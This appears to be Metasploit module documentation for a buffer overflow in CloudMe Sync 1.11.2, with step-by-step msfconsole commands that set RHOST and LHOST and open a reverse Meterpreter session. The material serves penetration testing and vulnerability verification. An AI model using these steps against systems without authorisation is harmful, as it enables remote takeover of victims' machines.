This module exploits a buffer overflow vulnerability found in CloudMe Sync v1.11.2.
An issue was discovered in CloudMe 1.11.2. An unauthenticated remote attacker that can connect to the "CloudMe Sync" client application listening on port 8888 can send a malicious payload causing a buffer overflow condition. This will result in an attacker controlling the program's execution flow and allowing arbitrary code execution.
- Install CloudMe for Desktop version
v1.11.2
- Start the applicaton (you don't need to create an account)
- Start
msfconsole
- Do
use exploit/windows/misc/cloudme_sync2
- Do
set RHOST ip
- Do
set LHOST ip
- Do
exploit
- Verify the Meterpreter session is opened